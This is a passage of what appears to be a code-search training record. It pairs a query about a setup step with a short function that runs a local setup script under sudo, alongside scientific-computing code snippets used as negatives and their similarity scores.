0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, 
E)\n assert 1.95 < abs(bot) / top < 1.96", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V" ]
[ "0.6024059", "0.58742326", "0.5747745", "0.57027227", "0.5643047", "0.5618062", "0.5584847", "0.5547953", "0.5515293", "0.54348683", "0.5426006", "0.5425438", "0.5389946", "0.53414834", "0.532526", "0.5292617", "0.52875394", "0.5270108", "0.52518106", "0.5248011", "0.52446", "0.52234286", "0.52206236", "0.5220036", "0.52104884", "0.52062696", "0.51975626", "0.5190072", "0.5188982", "0.5188493", "0.5188461", "0.5181919", "0.51750976", "0.5166205", "0.51637584", "0.51606363", "0.5152328", "0.51499075", "0.5140844", "0.5118976", "0.51187587", "0.5113119", "0.5108601", "0.5106117", "0.51013035", "0.5100481", "0.5091519", "0.50855076", "0.50759745", "0.50751156", "0.5073112", "0.50707734", "0.50700915", "0.5064913", "0.5064796", "0.50634605", "0.50616086", "0.5060999", "0.5060169", "0.50599927", "0.50564355", "0.50556827", "0.50508636", "0.5049896", "0.5049714", "0.50401515", "0.5037747", "0.5034233", "0.5031286", "0.5028459", "0.502825", "0.5028197", "0.5027813", "0.50243986", "0.5018472", "0.5017338", "0.50172013", "0.50169224", "0.5012277", "0.501089", "0.5004234", "0.4999304", "0.4998335", "0.49902856", "0.49899575", "0.49880874", "0.4987551", "0.49843842", "0.4982336", "0.49781463", "0.4976788", "0.49765167", "0.49759012", "0.4972044", "0.49711084", "0.49655244", "0.49615902", "0.4961197", "0.49608052", "0.49594963", "0.4934871" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.4
def setup(): sudo("minv_setup.sh")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. 
generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n 
return(temp_vn_array)", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def test_post_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, 
self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def prove_N() -> Proof:\n # Optional Task 6.8", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n 
except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 